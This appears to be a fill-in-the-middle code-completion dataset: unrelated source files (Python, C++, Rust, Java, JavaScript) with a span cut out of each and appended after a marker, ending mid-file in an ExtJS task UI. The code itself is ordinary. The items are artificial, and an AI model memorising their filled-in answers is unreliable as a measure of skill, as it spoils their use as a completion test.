self.mapping = getattr(obj, "mapping", None)
def _mapped_eq(self, other):
if other in self.mapping:
return super().__eq__(self.mapping[other])
else:
result = np.zeros(len(self), dtype=np.bool)
for k, v in self.mapping.items():
if k == other:
result = np.logical_or(result, super().__eq__(v))
return result
def __eq__(self, other):
if isinstance(other, str):
return self._mapped_eq(other)
else:
return super().__eq__(other)
def __ne__(self, other):
if isinstance(other, str):
return np.logical_not(self._mapped_eq(other))
else:
return super().__ne__(other)
# noinspection PyAbstractClass
class AliasCSRMatrix(csr_matrix):
"""Same as :class:`AliasArray` but for a CSR matrix
Examples
--------
>>> from scipy.sparse import spdiags
>>> m = AliasCSRMatrix(spdiags([1, 2, 1], [0], 3, 3), mapping={'A': 1, 'B': 2})
>>> list(m.data == 'A')
[True, False, True]
>>> list(m.tocoo().data == 'A')
[True, False, True]
>>> list(m[:2].data == 'A')
[True, False]
"""
def __init__(self, *args, **kwargs):
mapping = kwargs.pop('mapping', {})
if not mapping:
mapping = getattr(args[0], 'mapping', {})
super().__init__(*args, **kwargs)
self.data = AliasArray(self.data, mapping)
@property
def format(self):
return 'csr'
@format.setter
def format(self, _):
pass
@property
def mapping(self):
return self.data.mapping
def tocoo(self, *args, **kwargs):
coo = super().tocoo(*args, **kwargs)
coo.data = AliasArray(coo.data, mapping=self.mapping)
return coo
def __getitem__(self, item):
result = super().__getitem__(item)
if getattr(result, 'format', '') == 'csr':
return AliasCSRMatrix(result, mapping=self.mapping)
else:
return result
class AliasIndex:
"""An all-or-nothing array index based on equality with a specific value
The `==` and `!=` operators are overloaded to return a lazy array which is either
all `True` or all `False`. See the examples below. This is useful for modifiers
where the each call gets arrays with the same sub_id/hop_id for all elements.
Instead of passing an `AliasArray` with `.size` identical element, `AliasIndex`
does the same all-or-nothing indexing.
Examples
--------
>>> l = np.array([1, 2, 3])
>>> ai = AliasIndex("A", len(l))
>>> list(l[ai == "A"])
[1, 2, 3]
>>> list(l[ai == "B"])
[]
>>> list(l[ai != "A"])
[]
>>> list(l[ai != "B"])
[1, 2, 3]
>>> np.logical_and([True, False, True], ai == "A")
array([ True, False, True], dtype=bool)
>>> np.logical_and([True, False, True], ai != "A")
array([False, False, False], dtype=bool)
>>> bool(ai == "A")
True
>>> bool(ai != "A")
False
>>> str(ai)
'A'
>>> hash(ai) == hash("A")
True
>>> int(ai.eye)
1
>>> np.allclose(AliasIndex("A", 1, (2, 2)).eye, np.eye(2))
True
"""
class LazyArray:
def __init__(self, value, shape):
self.value = value
self.shape = shape
def __bool__(self):
return bool(self.value)<|fim▁hole|> return np.full(self.shape, self.value)
def __init__(self, name, shape, orbs=(1, 1)):
self.name = name
self.shape = shape
self.orbs = orbs
def __str__(self):
return self.name
def __eq__(self, other):
return self.LazyArray(self.name == other, self.shape)
def __ne__(self, other):
return self.LazyArray(self.name != other, self.shape)
def __hash__(self):
return hash(self.name)
@property
def eye(self):
return np.eye(*self.orbs)
class SplitName(str):
"""String subclass with special support for strings of the form "first|second"
Operators `==` and `!=` are overloaded to return `True` even if only the first part matches.
Examples
--------
>>> s = SplitName("first|second")
>>> s == "first|second"
True
>>> s != "first|second"
False
>>> s == "first"
True
>>> s != "first"
False
>>> s == "second"
False
>>> s != "second"
True
"""
@property
def first(self):
return self.split("|")[0]
def __eq__(self, other):
return super().__eq__(other) or self.first == other
def __ne__(self, other):
return super().__ne__(other) and self.first != other
def __hash__(self):
return super().__hash__()<|fim▁end|> |
def __array__(self): |
<|file_name|>PersBug_src.cpp<|end_file_name|><|fim▁begin|>#include "Ht.h"
#include "PersBug.h"
void
CPersBug::PersBug()
{
if (PR_htValid) {
switch (PR_htInst) {
case BUG_RTN: {
if (SendReturnBusy_htmain()) {
HtRetry();
break;
}
SendReturn_htmain();
}
break;
default:<|fim▁hole|>}<|fim▁end|> | assert(0);
}
} |
<|file_name|>test_filter_totals_from_share_results.py<|end_file_name|><|fim▁begin|>from datetime import timedelta
from unittest import TestCase
import pandas as pd
import pandas.testing
from fireant.dataset.modifiers import Rollup
from fireant.dataset.totals import scrub_totals_from_share_results
from fireant.tests.dataset.mocks import (
dimx0_metricx2_df,
dimx1_str_df,
dimx1_str_totals_df,
dimx2_date_str_df,
dimx2_date_str_totals_df,
dimx2_date_str_totalsx2_df,
mock_dataset,
)
TIMESTAMP_UPPERBOUND = pd.Timestamp.max - timedelta(seconds=1)
class ScrubTotalsTests(TestCase):
def ignore_dimensionless_result_sets(self):
result = scrub_totals_from_share_results(dimx0_metricx2_df, [])
expected = dimx0_metricx2_df
pandas.testing.assert_frame_equal(result, expected)
def test_remove_totals_for_non_rollup_dimensions(self):
result = scrub_totals_from_share_results(dimx1_str_totals_df, [mock_dataset.fields.political_party])
expected = dimx1_str_df
pandas.testing.assert_frame_equal(result, expected)
def test_remove_totals_for_non_rollup_dimensions_with_multiindex(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totals_df, [mock_dataset.fields.timestamp, mock_dataset.fields.political_party]
)
expected = dimx2_date_str_df
<|fim▁hole|> def test_remove_totals_for_non_rollup_dimensions_with_multiindex_and_multiple_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [mock_dataset.fields.timestamp, mock_dataset.fields.political_party]
)
expected = dimx2_date_str_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions(self):
result = scrub_totals_from_share_results(dimx1_str_totals_df, [Rollup(mock_dataset.fields.political_party)])
expected = dimx1_str_totals_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totals_df, [mock_dataset.fields.timestamp, Rollup(mock_dataset.fields.political_party)]
)
expected = dimx2_date_str_totals_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_lower_dimension_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [mock_dataset.fields.timestamp, Rollup(mock_dataset.fields.political_party)]
)
expected = dimx2_date_str_totalsx2_df.loc[:TIMESTAMP_UPPERBOUND]
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_higher_dimension_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [Rollup(mock_dataset.fields.timestamp), mock_dataset.fields.political_party]
)
expected = dimx2_date_str_totalsx2_df.loc[(slice(None), slice('Democrat', 'Republican')), :].append(
dimx2_date_str_totalsx2_df.iloc[-1]
)
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_all_rolled_up(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df,
[Rollup(mock_dataset.fields.timestamp), Rollup(mock_dataset.fields.political_party)],
)
expected = dimx2_date_str_totalsx2_df
pandas.testing.assert_frame_equal(result, expected)<|fim▁end|> | pandas.testing.assert_frame_equal(result, expected)
|
<|file_name|>test_binary_search_trees.py<|end_file_name|><|fim▁begin|># import data_structures.binary_search_trees.rope as rope
import data_structures.binary_search_trees.set_range_sum as set_range_sum
import data_structures.binary_search_trees.tree_orders as tree_orders
import pytest
import os
import sys
import resource
CI = os.environ.get('CI') == 'true'
# Helpers
class BinarySearchTree:
def __init__(self):
self.root = None
self.size = 0
def length(self):
return self.size
def __len__(self):
return self.size
def __iter__(self):
return self.root.__iter__()
def get(self, key):
if self.root:
res = self.find(key, self.root)
if res and res.key == key:
return res.payload
else:
return None
else:
return None
def find(self, key, node):
if node.key == key:
return node
if key < node.key:
if not node.has_left_child():
return node
return self.find(key, node.left_child)
else:
if not node.has_right_child():
return node
return self.find(key, node.right_child)
def __getitem__(self, key):
return self.get(key)
def __contains__(self, key):
if self.get(key):
return True
else:
return False
def put(self, key, val):
if self.root:
print("put on empty")
self._put(key, val, self.root)
else:
print("put on non empty")
self.root = TreeNode(key, val)
self.size += 1
def _put(self, key, val, node):
_parent = self.find(key, node)
if _parent.key == key: # already exists, replace values
_parent.replace_node_data(key, val, _parent.left_child,
_parent.right_child)
return
# At this point is guaranteed that _parent has null child
if key < _parent.key:
assert not _parent.has_left_child()
_parent.left_child = TreeNode(key, val, parent=_parent)
else:
assert not _parent.has_right_child()
_parent.right_child = TreeNode(key, val, parent=_parent)
def __setitem__(self, k, v):
"""
Allows usage of [].
:param k:
:param v:
:return:
"""
self.put(k, v)
class TreeNode:
def __init__(self, key, val, left=None, right=None, parent=None):
self.key = key
self.payload = val
self.left_child = left
self.right_child = right
self.parent = parent
def has_left_child(self):
return self.left_child
def has_right_child(self):
return self.right_child
def is_left_child(self):
return self.parent and self.parent.leftChild == self
def is_right_child(self):
return self.parent and self.parent.rightChild == self
def is_root(self):
return not self.parent
def is_leaf(self):
return not (self.right_child or self.left_child)
<|fim▁hole|> return self.right_child or self.left_child
def has_both_children(self):
return self.right_child and self.left_child
def replace_node_data(self, key, value, lc, rc):
self.key = key
self.payload = value
self.left_child = lc
self.right_child = rc
if self.has_left_child():
self.left_child.parent = self
if self.has_right_child():
self.right_child.parent = self
@pytest.mark.timeout(6)
class TestTreeOrders:
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class (which
usually contains tests).
"""
sys.setrecursionlimit(10 ** 6) # max depth of recursion
resource.setrlimit(resource.RLIMIT_STACK, (2 ** 27, 2 ** 27))
@pytest.mark.parametrize("n,key,left,right,exp_inorder,exp_preorder,exp_postorder", [
(5,
[4, 2, 5, 1, 3],
[1, 3, -1, -1, -1],
[2, 4, -1, -1, -1],
[1, 2, 3, 4, 5], [4, 2, 1, 3, 5], [1, 3, 2, 5, 4]),
(10,
[0, 10, 20, 30, 40, 50, 60, 70, 80, 90],
[7, -1, -1, 8, 3, -1, 1, 5, -1, -1],
[2, -1, 6, 9, -1, -1, -1, 4, -1, -1],
[50, 70, 80, 30, 90, 40, 0, 20, 10, 60],
[0, 70, 50, 40, 30, 80, 90, 20, 60, 10],
[50, 80, 90, 30, 40, 70, 10, 60, 20, 0])
])
def test_samples(self, n,key,left,right,exp_inorder,exp_preorder,exp_postorder):
tree = tree_orders.TreeOrders(n, key, left, right)
assert exp_inorder == tree.order(tree.in_order)
assert exp_preorder == tree.order(tree.pre_order)
assert exp_postorder == tree.order(tree.post_order)
@pytest.mark.timeout(120)
class TestSetRangeSum:
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class (which
usually contains tests).
"""
del set_range_sum.root
set_range_sum.root = None
@pytest.mark.parametrize(
"test_input,expected", [(
(
"? 1",
"+ 1",
"? 1",
"+ 2",
"s 1 2",
"+ 1000000000",
"? 1000000000",
"- 1000000000",
"? 1000000000",
"s 999999999 1000000000",
"- 2",
"? 2",
"- 0",
"+ 9",
"s 0 9"
),
[
"Not found",
"Found",
"3",
"Found",
"Not found",
"1",
"Not found",
"10",
]), (
(
"? 0",
"+ 0",
"? 0",
"- 0",
"? 0",
),
[
"Not found",
"Found",
"Not found"
]), (
(
"+ 491572259",
"? 491572259",
"? 899375874",
"s 310971296 877523306",
"+ 352411209",
),
[
"Found",
"Not found",
"491572259"
]),
# (
# (
# "s 88127140 859949755",
# "s 407584225 906606553",
# "+ 885530090",
# "+ 234423189",
# "s 30746291 664192454",
# "+ 465752492",
# "s 848498590 481606032",
# "+ 844636782",
# "+ 251529178",
# "+ 182631153",
# ),
# [
# "0",
# "0",
# "234423189"
# ])
])
def test_samples(self, test_input, expected):
result = []
processor = set_range_sum.RangeSumProcessor()
for cmd in test_input:
res = processor.process(cmd)
if res:
result.append(res)
assert result == expected
# def test_input_files(self):
# result = []
# processor = set_range_sum.RangeSumProcessor()
# for cmd in test_input:
# res = processor.process(cmd)
# if res:
# result.append(res)
# assert result == expected<|fim▁end|> | def has_any_children(self): |
<|file_name|>managed.rs<|end_file_name|><|fim▁begin|>use gfx::{Encoder, Resources, CommandBuffer, Slice, IndexBuffer};
use gfx::memory::{Usage, TRANSFER_DST};
use gfx::handle::Buffer;
use gfx::traits::{Factory, FactoryExt};
use gfx::buffer::Role;
use ui::render::Vertex;
// step: 128 vertices (4096 bytes, 42 triangles + 2 extra vertices)
const ALLOC_STEP: usize = 128;
#[derive(Debug)]
struct Zone {
start: usize,
size: usize
}
pub struct ManagedBuffer<R> where R: Resources {
local: Vec<Vertex>,
remote: Buffer<R, Vertex>,
zones: Vec<(Zone, bool)>,
tail: usize
}
impl<R> ManagedBuffer<R> where R: Resources {
pub fn new<F>(factory: &mut F) -> Self where F: Factory<R> {
ManagedBuffer {
local: Vec::new(),
remote: factory.create_buffer(ALLOC_STEP, Role::Vertex, Usage::Dynamic, TRANSFER_DST).unwrap(),
zones: Vec::new(),
tail: 0
}
}
pub fn new_zone(&mut self) -> usize {
self.zones.push((Zone {start: self.tail, size: 0}, true));
self.zones.len() - 1
}<|fim▁hole|> *dirty = true;
if zone.size == buffer.len() {
let slice = &mut self.local[zone.start..zone.start + zone.size];
slice.copy_from_slice(buffer);
} else {
// TODO: Shift later elements forward or backwards.
unimplemented!()
}
}
fn get_zone(&self, index: usize) -> &[Vertex] {
let zone = &self.zones[index].0;
&self.local[zone.start..zone.start+zone.size]
}
// TODO: Handle errors.
pub fn update<F, C>(&mut self, factory: &mut F, encoder: &mut Encoder<R, C>) where F: Factory<R> + FactoryExt<R>, C: CommandBuffer<R> {
//println!("Begin update");
if self.local.len() > self.remote.len() {
// Full update
let (pages, other) = (self.local.len() / ALLOC_STEP, self.local.len() % ALLOC_STEP);
let pages = pages + if other != 0 {1} else {0};
//println!("Full update {} -> {}", self.remote.len(), pages * ALLOC_STEP);
self.remote = factory.create_buffer(pages * ALLOC_STEP, Role::Vertex, Usage::Dynamic, TRANSFER_DST).unwrap();
encoder.update_buffer(&self.remote, &self.local[..self.tail], 0).unwrap();
} else {
// Partial update
for &mut (ref zone, ref mut dirty) in self.zones.iter_mut().filter(|&&mut (_, dirty)| dirty) {
// TODO: Performance: Roll adjacent updates into a single update.
//println!("Update partial: {:?}", zone);
encoder.update_buffer(&self.remote, &self.local[zone.start..zone.start+zone.size], zone.start).unwrap();
*dirty = false
}
}
//println!("End update");
}
pub fn remote(&self) -> &Buffer<R, Vertex> {
&self.remote
}
pub fn slice(&self) -> Slice<R> {
Slice {
start: 0,
end: self.tail as u32,
base_vertex: 0,
instances: None,
buffer: IndexBuffer::Auto
}
}
}
impl<R> Extend<Vertex> for ManagedBuffer<R> where R: Resources {
fn extend<I>(&mut self, iter: I) where I: IntoIterator<Item=Vertex> {
if let Some(zone) = self.zones.last_mut() {
let old_len = self.local.len();
self.local.extend(iter);
let len = self.local.len() - old_len;
zone.0.size += len;
zone.1 = true;
self.tail += len;
} else {
panic!("Tried to extend to a previously created zone, but there are no zones.");
}
}
}
impl<'a, R> Extend<&'a Vertex> for ManagedBuffer<R> where R: Resources {
fn extend<I>(&mut self, iter: I) where I: IntoIterator<Item=&'a Vertex> {
if let Some(zone) = self.zones.last_mut() {
let old_len = self.local.len();
self.local.extend(iter);
let len = self.local.len() - old_len;
zone.0.size += len;
zone.1 = true;
self.tail += len;
} else {
panic!("Tried to extend to a previously created zone, but there are no zones.");
}
}
}<|fim▁end|> |
pub fn replace_zone(&mut self, buffer: &[Vertex], zone: usize) {
let (ref mut zone, ref mut dirty) = self.zones[zone]; |
<|file_name|>CoAPEndpointUriFactory.java<|end_file_name|><|fim▁begin|>/* Generated by camel build tools - do NOT edit this file! */
package org.apache.camel.coap;
import java.net.URISyntaxException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import org.apache.camel.spi.EndpointUriFactory;
/**
* Generated by camel build tools - do NOT edit this file!
*/
public class CoAPEndpointUriFactory extends org.apache.camel.support.component.EndpointUriFactorySupport implements EndpointUriFactory {
private static final String BASE = "coaps+tcp:uri";
private static final String[] SCHEMES = new String[]{"coap", "coaps", "coap+tcp", "coaps+tcp"};
private static final Set<String> PROPERTY_NAMES;
static {
Set<String> set = new HashSet<>(17);
set.add("uri");
set.add("alias");
set.add("cipherSuites");
set.add("clientAuthentication");
set.add("privateKey");
set.add("pskStore");
set.add("publicKey");
set.add("recommendedCipherSuitesOnly");
set.add("sslContextParameters");
set.add("trustedRpkStore");
set.add("bridgeErrorHandler");<|fim▁hole|> set.add("exceptionHandler");
set.add("exchangePattern");
set.add("lazyStartProducer");
set.add("basicPropertyBinding");
set.add("synchronous");
PROPERTY_NAMES = set;
}
@Override
public boolean isEnabled(String scheme) {
for (String s : SCHEMES) {
if (s.equals(scheme)) {
return true;
}
}
return false;
}
@Override
public String buildUri(String scheme, Map<String, Object> properties) throws URISyntaxException {
String syntax = scheme + BASE;
String uri = syntax;
Map<String, Object> copy = new HashMap<>(properties);
uri = buildPathParameter(syntax, uri, "uri", null, false, copy);
uri = buildQueryParameters(uri, copy);
return uri;
}
@Override
public Set<String> propertyNames() {
return PROPERTY_NAMES;
}
@Override
public boolean isLenientProperties() {
return false;
}
}<|fim▁end|> | set.add("coapMethodRestrict"); |
<|file_name|>plot_chances.py<|end_file_name|><|fim▁begin|>import numpy as np
import matplotlib.pyplot as plt
import sys
fname = sys.argv[1]
exes = [0] * 101
wise = [0] * 101
f = open(fname, 'r')
for i in range(101):
split = f.readline().split(" ")
exes[i] = split[0]
wise[i] = split[1]
x = np.asarray(exes)
y = np.asarray(wise)<|fim▁hole|>ax.set_xlabel("Fraction through data")
ax.set_ylabel("Probability of correctness")
tit = fname[:-4].split(" ") # remove .txt
inte = "S_{err}= |, \sigma_{err}= |, S_{read}= |, \sigma_{err}= |, S_{curve}= ".split("|")
title = "$" + inte[0] + tit[0] + inte[1] + tit[1] + inte[2] + tit[2] + inte[3] + tit[3] + inte[4] + tit[4] + "$"
ax.set_title(title)
line, = ax.plot(x, y)
plt.show()<|fim▁end|> |
fig, ax = plt.subplots()
|
<|file_name|>busy_times.py<|end_file_name|><|fim▁begin|>import arrow
from dateutil import tz
import flask
import CONFIG
START_TIME = CONFIG.START_TIME
END_TIME = CONFIG.END_TIME
def get_busy_times(events):
"""
Gets a list of busy times calculated from the list of events.
:param events: a list of calendar events.
:return: a list of busy times in ascending order.
"""
begin_date = arrow.get(flask.session["begin_date"]).replace(<|fim▁hole|> busy_dict = get_busy_dict(events, begin_date, end_date)
busy = get_busy_list(busy_dict)
return busy
def get_busy_dict(events, begin_date, end_date):
"""
Fills a dictionary with possible busy times from the list of events.
:param events: a list of calendar events.
:param begin_date: is the start of the selected time interval.
:param end_date: is the end of the selected time interval.
:return: a dict of events representing possible busy times.
"""
busy_dict = {}
# print('busy times')
for event in events:
available = is_available(event)
event_start, event_end, is_all_day = get_start_end_datetime(event)
day_start = event_start.replace(hour=START_TIME, minute=0)
day_end = event_end.replace(hour=END_TIME, minute=0)
# all day events that either begin or end in the time interval
if ((begin_date <= event_start <= end_date or
begin_date <= event_end <= end_date) and
not available and is_all_day):
if day_start < begin_date:
event['start']['dateTime'] = begin_date.isoformat()
else:
event['start']['dateTime'] = day_start.isoformat()
if event_end > end_date:
event['end']['dateTime'] = end_date.isoformat()
else:
event['end']['dateTime'] = day_end.replace(days=-1).isoformat()
# print('0 {} - {}'.format(event['start']['dateTime'],
# event['end']['dateTime']))
busy_dict[event['start']['dateTime']] = event
# events completely within individual days and the time interval
elif (begin_date <= event_start <= end_date and
begin_date <= event_end <= end_date and
not available and not is_all_day):
if event_start < day_start:
event['start']['dateTime'] = day_start.isoformat()
if event_end > day_end:
event['end']['dateTime'] = day_end.isoformat()
# print('1 {} - {}'.format(event['start']['dateTime'],
# event['end']['dateTime']))
busy_dict[event['start']['dateTime']] = event
# print()
return busy_dict
def get_busy_list(busy_dict):
"""
Removes or combines the possible busy times from the busy dictionary and
returns a sorted list.
:param busy_dict: a dict of events representing possible busy times.
:return: a sorted list of events representing busy times.
"""
busy = []
remove_list = []
for i in sorted(busy_dict):
for j in sorted(busy_dict):
event = busy_dict[i]
event_start = arrow.get(event['start']['dateTime'])
event_end = arrow.get(event['end']['dateTime'])
event_end_time = event_end.format('HH:mm')
other_event = busy_dict[j]
other_event_start = arrow.get(other_event['start']['dateTime'])
other_event_end = arrow.get(other_event['end']['dateTime'])
other_event_start_time = other_event_start.format('HH:mm')
other_event_start_mod = other_event_start.replace(days=-1,
hour=END_TIME)
if event != other_event:
if (other_event_start >= event_start and
other_event_end <= event_end):
remove_list.append(other_event)
if (event_end_time == '17:00' and
other_event_start_time == '09:00' and
event_end == other_event_start_mod):
event['end']['dateTime'] = other_event['end']['dateTime']
remove_list.append(other_event)
if event_end == other_event_start:
event['end']['dateTime'] = other_event['end']['dateTime']
remove_list.append(other_event)
for i in sorted(busy_dict):
if busy_dict[i] not in remove_list:
busy.append(busy_dict[i])
return busy
def get_events(service):
"""
Gets a list of events from the Google calendar service.
:param service: is the Google service from where the calendar is retrieved.
:return: a list of events.
"""
events = []
for cal_id in flask.session['checked_calendars']:
cal_items = service.events().list(calendarId=cal_id).execute()
for cal_item in cal_items['items']:
events.append(cal_item)
return events
def is_available(event):
"""
Checks if the event has the transparency attribute.
:param event: is the event to check.
:return: True if it is transparent and False if not
"""
if 'transparency' in event:
available = True
else:
available = False
return available
def get_start_end_datetime(event):
"""
Gets the event's start and end as arrow objects.
:param event: is the event to check.
:return: a 2-tuple of the events start and end as an arrow objects.
"""
is_all_day = False
if 'dateTime' in event['start']:
event_start = arrow.get(
event['start']['dateTime']).replace(tzinfo=tz.tzlocal())
event_end = arrow.get(
event['end']['dateTime']).replace(tzinfo=tz.tzlocal())
else:
event_start = arrow.get(
event['start']['date']).replace(tzinfo=tz.tzlocal())
event_end = arrow.get(
event['end']['date']).replace(tzinfo=tz.tzlocal())
is_all_day = True
return event_start, event_end, is_all_day<|fim▁end|> | hours=+START_TIME)
end_date = arrow.get(flask.session['end_date']).replace(hours=+END_TIME)
|
<|file_name|>index.js<|end_file_name|><|fim▁begin|>Ext.namespace("Ext.haode");
Ext.haode.Control = function(args){
Ext.apply(this, args);
this.init();
};
Ext.haode.Control.prototype = {
userName : '',
version : '',
app_name : '',
copyright : '',
viewport : null,
cn : 1,
init : function() {
this.viewport = this.getViewport();
},
getViewport : function() {
var viewport;
if (this.viewport) {
viewport = this.viewport;
} else {
var centerPanel = this.getCenterPanel();
viewport = new Ext.Viewport({
layout: 'fit',
items: [centerPanel]
});
}
return viewport;
},
getCenterPanel : function() {
var panel;
if (this.viewport) {
panel = this.getViewport().items[0];
} else {
var n = new Ext.Button({
id : 'tsb',
text : '发放任务',
align : 'right',
width : 80,
menu : [{
text : '常规任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
timeout : 1000000,
url : 'task.do?action=normal',
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
// }, {
// text : '个别任务',
// handler : function() {
// if (!Ext.getCmp('form').getForm().isValid()) {
// alert('请正确填写表单');
// return;
// }
//
// var sm = new Ext.grid.CheckboxSelectionModel();
// var store1 = new Ext.data.Store({
// proxy : new Ext.data.HttpProxy({
// url : 'customerManager.do?action=queryAll'
// }),
// reader : new Ext.data.JsonReader({
// root : 'rows',
// totalProperty : 'total',
// id : 'id',
// fields : ['id', 'name', 'username']
// })
// });
//
// var paging = new Ext.PagingToolbar({
// pageSize : 20,
// store : store1,
// displayInfo : true,
// displayMsg : '当前显示数据 {0} - {1} of {2}',
// emptyMsg : '没有数据'
// });
//
// var win = new Ext.Window({
// title : '客户经理',
// id : 'bind',
// layout : 'fit',
// border : false,
// modal : true,
// width : 500,
// height : 400,
// items : [new Ext.grid.GridPanel({
// id : 'grid1',
// loadMask : true,
//// tbar : [{
//// xtype : 'textfield',
//// id : 'searchName',
//// emptyText : '请输入客户经理名称...',
//// width : 150
//// }, {
//// text : '搜索',
//// width : 45,
//// xtype : 'button',
//// handler : function() {
////
//// }
//// }],
// store : store1,
// sm : sm,
// cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
// header : '客户经理名称',
// width : 200,
// dataIndex : 'name',
// align : 'center'
// }, {
// header : '客户经理用户名',
// width : 230,
// dataIndex : 'username',
// align : 'center'
// }]),
// bbar : paging
// })],
// buttons : [{
// text : '确定',
// handler : function() {
// var mrecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
// if (mrecords.length < 1) {
// alert('请选择要做任务的客户经理!');
// return;
// }
// var mids = '';
// for (var j = 0; j < mrecords.length; j++) {
// mids += ',' + mrecords[j].get('id');
// }
//
// Ext.getCmp('bind').close();
// Ext.getCmp('form').getForm().submit({
// waitTitle : '提示',
// waitMsg : '正在提交数据请稍后...',
// url : 'task.do?action=indevi',
// params : {
// mids : mids
// },
// method : 'post',
// success : function(form, action) {
// alert(action.result.myHashMap.msg);
// },
// failure : function(form, action) {
// alert(action.result.myHashMap.msg);
// }
// });
//
// }
// }, {
// text : '取消',
// handler : function() {
// Ext.getCmp('bind').close();
// }
// }]
// });
// win.show(Ext.getBody());
// store1.load({
// params : {
// start : 0,
// limit : 20
// }
// });
//
// }
}, {
text : '分组任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var sm = new Ext.grid.CheckboxSelectionModel();
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customerGroup.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var win = new Ext.Window({
title : '客户分组',
id : 'bind',
layout : 'fit',
border : false,
modal : true,
width : 500,
height : 400,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户分组名称',
width : 200,
dataIndex : 'name',
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var grecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (grecords.length < 1) {
alert('请选择客户分组!');
return;
}
var gids = '';
for (var j = 0; j < grecords.length; j++) {
gids += ',' + grecords[j].get('id');
}
Ext.getCmp('bind').close();
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
url : 'task.do?action=group',
params : {
gids : gids
},
method : 'post',
success : function(form, action) {
alert(action.result.myHashMap.msg);
},
failure : function(form, action) {
alert(action.result.myHashMap.msg);
}
});
}
}, {
text : '取消',
handler : function() {
Ext.getCmp('bind').close();
}
}]
});
win.show(Ext.getBody());
store1.load({
params : {
start : 0,
limit : 20,
all : 0
}
});
}
}, {
text : '客户任务',
handler : function() {
if (!Ext.getCmp('form').getForm().isValid()) {
alert('请正确填写表单');
return;
}
var store1 = new Ext.data.Store({
proxy : new Ext.data.HttpProxy({
url : 'customer.do?action=queryAll'
}),
reader : new Ext.data.JsonReader({
root : 'rows',
totalProperty : 'total',
id : 'id',
fields : ['id', 'name', 'number', 'sell_number', 'store_name', 'level', 'phone_number', 'manager',
'backup_number', 'address', 'order_type', 'gps', 'last_visit_time']
})
});
var paging = new Ext.PagingToolbar({
pageSize : 20,
store : store1,
displayInfo : true,
displayMsg : '当前显示数据 {0} - {1} of {2}',
emptyMsg : '没有数据'
});
var sm = new Ext.grid.CheckboxSelectionModel();
var win1 = new Ext.Window({
title : '选择客户',
id : 'chooseCustomer',
layout : 'fit',
border : false,
modal : true,
width : 800,
height : 600,
items : [new Ext.grid.GridPanel({
id : 'grid1',
loadMask : true,
store : store1,
sm : sm,
cm : new Ext.grid.ColumnModel([new Ext.grid.RowNumberer({width:38}), sm, {
header : '客户名称',
width : 100,
dataIndex : 'name',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户编号',
width : 130,
dataIndex : 'number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '专卖证号',
width : 130,
dataIndex : 'sell_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '店铺名称',
width : 200,
dataIndex : 'store_name',
sortable : true,
remoteSort : true,
align : 'left'
}, {
header : '客户级别',
width : 90,
dataIndex : 'level',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '电话号码',
width : 100,
dataIndex : 'phone_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '客户经理',
width : 120,
dataIndex : 'manager',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '备用号码',
width : 100,
dataIndex : 'backup_number',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '经营地址',
width : 240,
dataIndex : 'address',
sortable : true,
remoteSort : true,
align : 'left',
renderer : function(value, meta) {
meta.attr = 'title="' + value + '"';
return value;
}
}, {
header : '订货类型',
width : 60,
dataIndex : 'order_type',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : 'GPS(经度,纬度)',
width : 150,
dataIndex : 'gps',
sortable : true,
remoteSort : true,
align : 'center'
}, {
header : '最近一次拜访时间',
width : 180,
dataIndex : 'last_visit_time',
sortable : true,
remoteSort : true,
align : 'center'
}]),
bbar : paging
})],
buttons : [{
text : '确定',
handler : function() {
var crecords = Ext.getCmp('grid1').getSelectionModel().getSelections();
if (crecords.length < 1) {
alert('请选择要拜访的客户!');
return;
}
var size = crecords.length;
var cids = "";
for (var i = 0; i < size; i++) {
cids += ',' + crecords[i].get('id');
}
Ext.getCmp('form').getForm().submit({
waitTitle : '提示',
waitMsg : '正在提交数据请稍后...',
